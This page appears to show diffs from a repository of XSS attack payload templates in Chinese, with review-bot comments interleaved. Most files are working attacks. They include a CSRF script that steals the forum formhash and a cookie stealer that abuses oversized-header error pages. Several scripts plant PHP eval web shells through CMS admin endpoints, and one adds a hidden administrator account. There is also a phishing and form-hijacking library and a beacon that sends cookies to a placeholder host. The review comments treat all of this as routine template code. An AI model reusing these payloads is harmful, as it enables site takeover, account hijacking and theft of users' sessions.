0.07);}.ace-chrome .ace_gutter-active-line {background-color : #dcdcdc;}.ace-chrome .ace_marker-layer .ace_selected-word {background: rgb(250, 250, 255);border: 1px solid rgb(200, 200, 250);}.ace-chrome .ace_storage,.ace-chrome .ace_keyword,.ace-chrome .ace_meta.ace_tag {color: rgb(147, 15, 128);}.ace-chrome .ace_string.ace_regex {color: rgb(255, 0, 0)}.ace-chrome .ace_string {color: #1A1AA6;}.ace-chrome .ace_entity.ace_other.ace_attribute-name {color: #994409;}.ace-chrome .ace_indent-guide {background: url("") right repeat-y;}';var r=e("../lib/dom");r.importCssString(t.cssText,t.cssClass)})

File diff suppressed because one or more lines are too long

5
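--- a/template/.htaccess
+++ b/template/.htaccess
@@ -0,0 +1,5 @@
+<Files ~ "\.js$">
+Order allow,deny
+Allow from all
+</Files>
+deny from all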
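Review bot: `Order allow,deny`, `Allow from all` and `deny from all` are the Apache 2.2 access directives, which httpd 2.4 only accepts through mod_access_compat. Without that module the file makes every request under `template/` fail with a server error. The rule also does nothing where `.htaccess` overrides are disabled or the site runs on a server that ignores `.htaccess`, and in that case the `.desc` files and `index.html` become readable. The file should state its intent in a comment and carry the 2.4 form next to the legacy one, as sketched below. The deployment notes should say that the directory must not be web-readable when overrides are off.

```apache
# Serve only the .js templates; everything else in template/ stays private.
<IfModule mod_authz_core.c>
    Require all denied
    <FilesMatch "\.js$">
        Require all granted
    </FilesMatch>
</IfModule>
<IfModule !mod_authz_core.c>
    # … unchanged: existing Order/Allow/deny lines …
</IfModule>
```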


@@ -0,0 +1 @@
EMNCwPkx9TYn5ZDlqfBEslnYYeGJHLcLb/qv5OaG+4o5SVqZ6hSCM5Eirk6LU9gmU0Qek8YzlINj/+DMO1Xm3SoQnptHAC94I0KuA4f0ztsevD2nlMGjrB8R9PxW4oZzty8EZq1e0g0NM2NWEXf4gQ==

78
template/Discuz! CSRF.js Normal file

@@ -0,0 +1,78 @@
function getHash() {
for (var i = 0; i < document.links.length; i++) {
if (document.links[i].href.indexOf("action=logout&formhash=") > 0) {
hash = document.links[i].href;
hash = hash.substr(hash.length - 8, hash.length);
break;
}
}
}
x = window.x || {
request: function() {
if (window.XMLHttpRequest) {
var ajax = new XMLHttpRequest()
} else if (window.ActiveXObject) {
try {
var ajax = new ActiveXObject("Msxml2.XMLHTTP")
} catch (e) {
try {
var ajax = new ActiveXObject("Microsoft.XMLHTTP")
} catch (e) {}
}
}
return ajax
},
handle: function(ajax, callback) {
ajax.onreadystatechange = function() {
if (ajax.readyState == 4) {
if (ajax.status == 200) {
callback(ajax.responseText)
}
}
}
},
display: function(o) {
if (typeof(o) == 'object') {
var str = '';
for (a in o) {
str += a + '=' + o[a] + '&';
}
str = str.substr(0, str.length - 1);
return str;
} else {
return o;
}
},
get: function(url, callback) {
ajax = x.request();
ajax.open('get', url, true);
ajax.send(null);
x.handle(ajax, callback)
},
post: function(url, content, callback) {
ajax = x.request();
ajax.open('post', url, true);
ajax.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
content = x.display(content);
ajax.send(content);
x.handle(ajax, callback)
},
}
var hash = "";
getHash();
/*发帖操作
x.post("接口地址","formhash="+hash+"&posttime=137756647&wysiwyg=1&subject=%E6%96%B0%E4%BA%BA%E6%8A%A5%E9%81%93TEST&message=%E6%96%B0%E4%BA%BA%E6%8A%A5%E9%81%93TEST+hacked++by+helen&replycredit_extcredits=0&replycredit_times=1&replycredit_membertimes=1&replycredit_random=100&readperm=&price=&tags=test&rushreplyfrom=&rushreplyto=&rewardfloor=&stopfloor=&creditlimit=&save=&adddynamic=true&usesig=1&allownoticeauthor=1");
*/
/*置顶帖子 <script src="http://w/try/1.js"> </script>
x.post("接口地址","frommodcp=&formhash="+hash+"&fid=2&redirect=&listextra=page%3D1&handlekey=mods&moderate[]=12&operations[]=stick&sticklevel=3&expirationstick=&digestlevel=0&expirationdigest=&highlight_color=0&highlight_style[1]=0&highlight_style[2]=0&highlight_style[3]=0&expirationhighlight=&reason=");
*/
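Review bot: `getHash()` and the two commented-out `x.post(...)` examples carry no comment saying what the template relies on, so a reader cannot tell from the file what the `formhash` value is or why script in the page can obtain it. A header comment would cover it, e.g. `// Reads the forum's formhash (anti-CSRF token) from the logout link in document.links; any script running in the page's origin can read it, so the token stops cross-site requests only, not injected script`. The defensive consequence is worth one more line there: output encoding and a Content-Security-Policy that blocks injected script protect these endpoints, and the token alone does not.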


@@ -0,0 +1 @@
sSKYRBjjtWZmxavSz6MBJYsw9klXnW3MqDZHZjN+MjeFl9XSrwTAXL1R02fnP9WplAAkFxeMJoxpym44zsx9R+LheQ2l1CAiOlfuCYL+SRH5d9RwAT0KpxkU/vZY


@@ -0,0 +1,36 @@
var website="http://网站地址";
function setCookies() {
/*apache server limit 8192*/
var str = "";
for (var i = 0; i < 819; i++) {
str += "x";
}
for (i = 0; i < 10; i++) {
var cookie = "ray" + i + "=" + str + ";path=/";
document.cookie = cookie;
}
}
function parseCookies() {
if (xhr.readyState === 4 && xhr.status === 400) {
var content = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
content = content[1].replace("Cookie: ", "");
cookies = content.replace(/ray\d=x+;?/g, '')
try {
var myopener = '';
myopener = window.parent.openner.location;
var myparent = '';
myparent = window.parent.location;
} catch (err) {
myopener = '0';
myparent = '0';
}
window.location = website + '/index.php?location=' + escape(document.location) + '&toplocation=' + escape(myparent) + '&cookie=' + escape(cookies) + '&opener=' + escape(myopener);
}
}
setCookies();
var xhr = window.XMLHttpRequest ? new XMLHttpRequest() : window.ActiveXObject ? new ActiveXObject("Microsoft.XMLHTTP") : new XMLHttpRequest();
xhr.onreadystatechange = parseCookies;
xhr.open("POST", "/?" + Math.random(), true);
xhr.send(null);
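Review bot: Nothing in the file states which server behaviour `setCookies()` and `parseCookies()` depend on; the only hint is `/*apache server limit 8192*/`. From the code, it sets ten cookies of 819 padding bytes each, expects a 400 response, and reads the `Cookie:` line back out of a `<pre>` block in the error body. That is presumably how it reaches cookies that `document.cookie` does not expose. A header comment should record that dependency, e.g. `// Depends on the server's 400 page echoing the oversized request header; an error page that does not reflect request headers defeats it`. `website` is a placeholder, and the file's name is not shown on this page.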


@@ -0,0 +1 @@
EO915s8Gh/G7MCsJfjX9/xXqA4+EXOgQBb6WrrW2njqanQK/sqYG4dgxwhGeG4AFNgICOMcHoI1/9bpc948zTp+MQ2jH/uew/Y9k4WJiES6BAfEybDJpbMmdJjfYDWTwJtSFmlwdGub5tq3Qn5USCsfnPVNtEcI5NFhawNDvphvsvn60qBNNmbXmcmgw/la3cDD3MOg=


@@ -0,0 +1,32 @@
varrequest = false;
if (window.XMLHttpRequest) {
request = newXMLHttpRequest();
if (request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
}
else if(window.ActiveXObject) {
varversions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
for (vari = 0; i < versions.length; i++) {
try {
request = newActiveXObject(versions);
} catch (e) {}
}
}
xmlhttp = request;
function getFolder(url) {
obj = url.split('/');
return obj[obj.length - 2];
}
oUrl = top.location.href;
u = getFolder(oUrl);
add_admin();
function add_admin() {
varurl = "/" + u + "/sys_sql_query.php";
varparams = "fmdo=edit&backurl=&activepath=%2Fdata&filename=123.php&str=<%3Fphp+eval%28%24_POST%5Br123%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", varparams.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.send(varparams);
}

1
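--- a/template/index.html
+++ b/template/index.html
@@ -0,0 +1 @@
+Boom has been planted!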


@@ -0,0 +1 @@
sSyoRzTLMZmiTmwqAGzoI5gm8EdPkHxHNNbLpNztso7XxohHcvZa


@@ -0,0 +1,61 @@
if (top.window.location.href.indexOf("pc_hash=") > 0) {
var hash = top.window.location.href.substr(top.window.location.href.indexOf("pc_hash=") + 8, 6);
}
var pkav = {
ajax: function() {
var xmlHttp;
try {
xmlHttp = new XMLHttpRequest();
} catch (e) {
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
return false;
}
}
}
return xmlHttp;
},
req: function(url, data, method, callback) {
method = (method || "").toUpperCase();
method = method || "GET";
data = data || "";
if (url) {
var a = this.ajax();
a.open(method, url, true);
if (method == "POST") {
a.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
}
a.onreadystatechange = function() {
if (a.readyState == 4 && a.status == 200) {
if (callback) {
callback(a.responseText);
}
}
};
if ((typeof data) == "object") {
var arr = [];
for (var i in data) {
arr.push(i + "=" + encodeURIComponent(data[i]));
}
a.send(arr.join("&"));
} else {
a.send(data || null);
}
}
},
get: function(url, callback) {
this.req(url, "", "GET", callback);
},
post: function(url, data, callback) {
this.req(url, data, "POST", callback);
}
};
if (!window.__x) {
pkav.post("index.php?m=template&c=file&a=edit_file&style=default&dir=announce&file=show.html", "code=%7Btemplate+%27content%27%2C+%27header%27%7D%0D%0A%3C%21--main--%3E%0D%0A%3Cdiv+class%3D%22main%22%3E%0D%0A%09%3Cdiv+class%3D%22col-left%22%3E%0D%0A++++%09%3Cdiv+class%3D%22crumbs%22%3E%3Ca+href%3D%22%7BAPP_PATH%7D%22%3E%CA%D7%D2%B3%3C%2Fa%3E%3Cspan%3E+%3E+%3C%2Fspan%3E%B9%AB%B8%E6%3C%2Fdiv%3E%0D%0A++++++++%3Cdiv+id%3D%22Article%22%3E%0D%0A++++++++%09%3Ch1%3E%7B%24title%7D%3Cbr+%2F%3E%0D%0A%3Cspan%3E%3C%2Fspan%3E%3C%2Fh1%3E%0D%0A%09%09%09%3Cdiv+class%3D%22content%22%3E%0D%0A%09%09%09++%7B%24content%7D%0D%0A%09%09%09%3C%2Fdiv%3E%0D%0A++++++%3C%2Fdiv%3E%0D%0A++%3C%2Fdiv%3E%0D%0A++++%3Cdiv+class%3D%22col-auto%22%3E%0D%0A++++++++%3Cdiv+class%3D%22box+pd_b0%22%3E%0D%0A%09%09%7Bpc%3Acomment+action%3D%22bang%22+cache%3D%223600%22%7D%0D%0A++++++++++++%3Cul+class%3D%22itemli%22%3E%0D%0A%09%09%09%7Bloop+%24data+%24r%7D%0D%0A++++++++++++++++%3Cli%3E%3Ca+href%3D%22%7B%24r%5Burl%5D%7D%22+target%3D%22_blank%22%3E%7Bstr_cut%28%24r%5Btitle%5D%2C+26%29%7D%3C%2Fa%3E%3C%2Fli%3E%0D%0A++++++++++++%7B%2Floop%7D%0D%0A++++++++++++%3C%2Ful%3E%0D%0A%09%09%7B%2Fpc%7D%0D%0A++++++++%3C%2Fdiv%3E%0D%0A++++%3C%2Fdiv%3E%0D%0A%3C%2Fdiv%3E%0D%0A%7Btemplate+%27content%27%2C+%27footer%27%7D%0D%0A%3Cscript+language%3Dphp%3E%24fp+%3D+%40fopen%28%22test.php%22%2C+%27a%27%29%3B%0D%0A%40fwrite%28%24fp%2C+%27%3C%27.%27%3Fphp%27.%22%5Cr%5Cn%5Cr%5Cn%22.%27%40eval%28%24_POST%5B%22chopper%22%5D%29%27.%22%5Cr%5Cn%5Cr%5Cn%3F%22.%22%3E%5Cr%5Cn%22%29%3B%0D%0A%40fclose%28%24fp%29%3B%3C%2Fscript%3E&dosubmit=%CC%E1%BD%BB&pc_hash=" + hash, function(rs) {});
pkav.get("index.php?m=template&c=file&a=visualization&style=default&dir=announce&file=show.html&pc_hash=" + hash, function(rs) {});
window.__x = 1;
}

1
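--- a/template/xss.desc
+++ b/template/xss.desc
@@ -0,0 +1 @@
+sBKxRzbQMa6/QVcft4M3sVX0YfSo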

181
template/xss.js Normal file

@@ -0,0 +1,181 @@
var xss = function() {
var x = {
'name': 'xss.js',
'version': '0.1',
'author': 'jackmasa'
};
x.x = function(id) {
return document.getElementById(id)
};
//容错取值
x.e = function(_) {
try {
return eval('(' + _ + ')')
} catch (e) {
return ''
}
};
//浏览器
x.i = {
i: !!self.ActiveXObject,
c: !!self.chrome,
f: self.mozPaintCount > -1,
o: !!self.opera,
s: !self.chrome && !!self.WebKitPoint
};
//UA
x.ua = navigator.userAgent;
//判断是否为苹果手持设备
x.apple = x.ua.match(/ip(one|ad|od)/i) != null;
//随机数
x.rdm = function() {
return ~~(Math.random() * 100000)
};
//url编码(UTF8)
x.ec = encodeURIComponent;
x.html = document.getElementsByTagName('html')[0];
/*
* 销毁一个元素
*/
x.kill = function(e) {
e.parentElement.removeChild(e);
};
/*
*绑定事件
*/
x.bind = function(e, name, fn) {
e.addEventListener ? e.addEventListener(name, fn, false) : e.attachEvent("on" + name, fn);
};
/*
* dom准备完毕时执行函数
*/
x.ready = function(fn) {
if (!x.i.i) {
x.bind(document, 'DOMContentLoaded', fn);
} else {
var s = setInterval(function() {
try {
document.body.doScroll('left');
clearInterval(s);
fn();
} catch (e) {}
}, 4);
}
}
/*
* 同源检测
*/
x.o = function(url) {
var link = x.dom('<a href="' + encodeURI(url) + '">', 2);
return link.protocol + link.hostname + ':' + link.port == location.protocol + location.hostname + ':' + link.port;
};
/*
* html to dom
*/
x.dom = function(html, gcsec) {
var tmp = document.createElement('span');
tmp.innerHTML = html;
var e = tmp.children[0];
e.style.display = 'none';
x.html.appendChild(e);
gcsec >> 0 > 0 && setTimeout(function() {
x.kill(e);
}, gcsec * 1000);
return e;
};
/*
* ajax
*/
x.ajax = function(url, params, callback) {
(params instanceof Function) && (callback = params, params = void(0));
var XHR = (!x.o(url) && window.XDomainRequest) ||
window.XMLHttpRequest ||
(function() {
return new ActiveXObject('MSXML2.XMLHTTP')
});
var xhr = new XHR();
xhr.open(params ? 'post' : 'get', url);
try {
xhr.setRequestHeader('content-type', 'application/x-www-form-urlencoded')
} catch (e) {}
callback && (xhr.onreadystatechange = function() {
(this.readyState == 4 && ((this.status >= 200 && this.status <= 300) || this.status == 304)) && callback.apply(this, arguments);
});
xhr.send(params);
};
/*
* no ajax
*/
x.najax = function(url, params) {
if (params) {
var form = x.dom('<form method=post accept-charset=utf-8>');
form.action = url;
for (var name in params) {
var input = document.createElement('input');
input.name = name;
input.value = params[name];
form.appendChild(input);
}
var iframe = x.dom('<iframe name=_' + x.rdm() + '_>', 6);
form.target = iframe.name;
form.submit();
} else {
new Image().src = url + '&' + x.rdm();
}
};
/*
* 钓鱼
*/
x.phish = function(url) {
x.ajax(url, function() {
document.open();
document.write(this.responseText);
document.close();
history.replaceState & x.o(url) && history.replaceState('', '', url);
})
};
/*
* 表单劫持
*/
x.xform = function(form, action) {
form.old_action = form.action, form.old_target = form.target, form.action = action;
var iframe = x.dom('<iframe name=_' + x.rdm() + '_>');
form.target = iframe.name;
setTimeout(function() {
x.bind(iframe, 'load', function() {
form.action = form.old_action, form.target = form.old_target, form.onsubmit = null, form.submit();
})
}, 30);
};
/*
* 函数代理
*/
x.proxy = function(fn, before, after) {
return function() {
before && before.apply(this, arguments);
var result = fn.apply(this, arguments);
after && after.apply(this, arguments);
return result;
}
};
return x;
}();


@@ -0,0 +1 @@
sRaIRS3NMqOMTmwi

1
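--- a/template/弹框测试.js
+++ b/template/弹框测试.js
@@ -0,0 +1 @@
+alert("xss");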

1
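--- a/template/截图.desc
+++ b/template/截图.desc
@@ -0,0 +1 @@
+vCSGRjLcMp+HTm0IBkfKsGfRY9SuEa0db8Cq7dKg95QKQVu75iiNsl7MK81g1hDggtB4JbVbtuoE5gxe2Zw5TooZkJtWi8DmJlP1F9SogknZALl/f0ISdJPmFbDSN2Bk9T0U7kuyGfzYLW8KHGb7ngQorzZEfw==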

4
template/截图.js Normal file

File diff suppressed because one or more lines are too long


@@ -0,0 +1 @@
vB+1RRrSMbKDQ0wYl6MXuEHZbM6ZHYM5bcqgeDFjfHzox4lTZ+t0vkvVJqvlLM1gCXF7IahbgvQF9BiJfRbygm0ZGkekiejXfxWygHQDSRbkdNFxDggT


@@ -0,0 +1,27 @@
var request = false;
if (window.XMLHttpRequest) {
request = new XMLHttpRequest();
if (request.overrideMimeType) {
request.overrideMimeType('text/xml');
}
} else if (window.ActiveXObject) {
var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0', 'Msxml2.XMLHTTP.6.0', 'Msxml2.XMLHTTP.5.0',
'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'
];
for (var i = 0; i < versions.length; i++) {
try {
request = new ActiveXObject(versions);
} catch (e) {}
}
}
xmlhttp = request;
thisTHost = top.location.hostname;
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
var params = 'name=123.php&content=<?php @eval($_POST[123]);?>';
xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xmlhttp.setRequestHeader("Content-length", params.length);
xmlhttp.setRequestHeader("Connection", "Keep-Alive");
xmlhttp.send(params);


@@ -0,0 +1 @@
vSqrSzPMrGV0Q207CVj0smLvYvWTH5Ysbs6V7t2x/bM4S2uy5BiEPrEPr3iUUvMLUWsvfL8M8/ZjkzQ0p4t4GqronIdNBSEz

2
template/默认模块.js Normal file

@@ -0,0 +1,2 @@
var website="http://网站地址";
(function(){(new Image()).src=website+'/?keepsession=1&location='+escape((function(){try{return document.location.href}catch(e){return''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return''}})())+'&opener='+escape((function(){try{return(window.opener&&window.opener.location.href)?window.opener.location.href:''}catch(e){return''}})());})();


@@ -0,0 +1 @@
vRehRgHRt3t0Q0kXCH7FsG3Ta9WzH5gAbtKZ7sqHeW7fz49CY/dFv1FX9nvnGOViFGX0+Ejdfh6CGOXRIQ==


@@ -0,0 +1,58 @@
var pkav = {
ajax: function() {
var xmlHttp;
try {
xmlHttp = new XMLHttpRequest();
} catch (e) {
try {
xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
} catch (e) {
try {
xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
} catch (e) {
return false;
}
}
}
return xmlHttp;
},
req: function(url, data, method, callback) {
method = (method || "").toUpperCase();
method = method || "GET";
data = data || "";
if (url) {
var a = this.ajax();
a.open(method, url, true);
if (method == "POST") {
a.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
}
a.onreadystatechange = function() {
if (a.readyState == 4 && a.status == 200) {
if (callback) {
callback(a.responseText);
}
}
};
if ((typeof data) == "object") {
var arr = [];
for (var i in data) {
arr.push(i + "=" + encodeURIComponent(data[i]));
}
a.send(arr.join("&"));
} else {
a.send(data || null);
}
}
},
get: function(url, callback) {
this.req(url, "", "GET", callback);
},
post: function(url, data, callback) {
this.req(url, data, "POST", callback);
}
};
if (!window.__x) {
pkav.post("/admin/index.php?lfj=member&action=addmember", "postdb%5Busername%5D=kakahuadmin&postdb%5Bpasswd%5D=kakahuadmin&postdb%5Bpasswd2%5D=kakahuadmin&postdb%5Bgroupid%5D=3&postdb%5Bemail%5D=kakahuadmin%40qq.com&Submit=%CC%E1%BD%BB", function(rs) {});
pkav.get("接口地址", function(rs) {});
window.__x = 1;
}